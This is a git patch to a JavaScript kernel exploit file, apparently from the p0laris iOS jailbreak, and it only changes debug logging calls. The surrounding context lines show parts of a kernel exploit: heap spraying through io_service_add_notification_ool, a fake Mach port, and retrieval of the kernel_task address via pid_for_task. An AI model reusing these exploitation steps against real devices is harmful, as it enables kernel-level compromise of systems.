From eb21089efd298dfec49ebd2836105f5d900d50ae Mon Sep 17 00:00:00 2001
From: spv420 <spv@spv.sh>
Date: Sun, 31 Jul 2022 03:40:20 -0400
Subject: fuck

---
 src/stage4/kexp/exploit.js | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js
index 04b7c34..aa10126 100755
--- a/src/stage4/kexp/exploit.js
+++ b/src/stage4/kexp/exploit.js
@@ -187,7 +187,7 @@ function spray(dict, size, port) {
 
 	ret = host_get_io_master(mach_host_self(), master);
 //	p0laris_log("yahtzee3 %d (%s) %p\n", ret, mach_error_string(ret), read_u32(master));
-//	scall("p0laris_log", "0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x\n", master, 0x41414141, "IOServiceTerminate", 0x41414141, dict, 0x41414141, size, 0x41414141, MACH_PORT_NULL, 0x41414141, NULL, 0x41414141, 0, 0x41414141, err, 0x41414141, port, 0x41414141);
+//	p0laris_log("0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x\n", master, 0x41414141, "IOServiceTerminate", 0x41414141, dict, 0x41414141, size, 0x41414141, MACH_PORT_NULL, 0x41414141, NULL, 0x41414141, 0, 0x41414141, err, 0x41414141, port, 0x41414141);
 	ret = io_service_add_notification_ool(read_u32(master), "IOServiceTerminate", dict, size, MACH_PORT_NULL, NULL, 0, err, port);
 //	p0laris_log("yahtzee %d (%s)\n", ret, mach_error_string(ret));
 
@@ -368,7 +368,7 @@ function mach_ports_lookup_shit() {
 	calls4arg("mach_ports_lookup", task_self, arrz, sz, 0);
 	puts("helo");
 	p0laris_log("mpl success\n");
-	scall("p0laris_log", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
+	p0laris_log("done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
 	p0laris_log("mpl success\n");
 
 	return read_u32(read_u32(arrz) + 8);
@@ -479,7 +479,7 @@ again: while (true) {
 //	mach_ports_lookup_shit_dealloc();
 	var ret__ = r3gister(mach_task_self(), arrz, 2, 3);
 	mach_ports_lookup(mach_task_self(), arrz, sz);
-	scall("p0laris_log", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
+	p0laris_log("done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
 	p0laris_log("mpl success\n");
 
 	var fake_port = read_u32(read_u32(arrz) + 8);
@@ -537,7 +537,7 @@ again: while (true) {
 	p0laris_log("fuck\n");
 	var kernel_task_addr = shit_heap(4);
 	p0laris_log("fuck\n");
-	scall("p0laris_log", "kernel_task address: 0x%08x\n", read_u32(kernel_task_addr));
+	p0laris_log("kernel_task address: 0x%08x\n", read_u32(kernel_task_addr));
 	ret__ = pid_for_task(fake_port, kernel_task_addr);
 	p0laris_log("%d %s\n", ret__, mach_error_string(ret__));
 	p0laris_log("fuck\n");
@@ -547,7 +547,7 @@ again: while (true) {
 	if (kernel_task_addr === 0xffffffff) {
 		continue again;
 	}
-	scall("p0laris_log", "kernel_task address: 0x%08x\n", read_u32(kernel_task_addr));
+	p0laris_log("kernel_task address: 0x%08x\n", read_u32(kernel_task_addr));
 	p0laris_log("fuck\n");
 
 	p0laris_log("get lucky\n");
-- 
cgit v1.2.3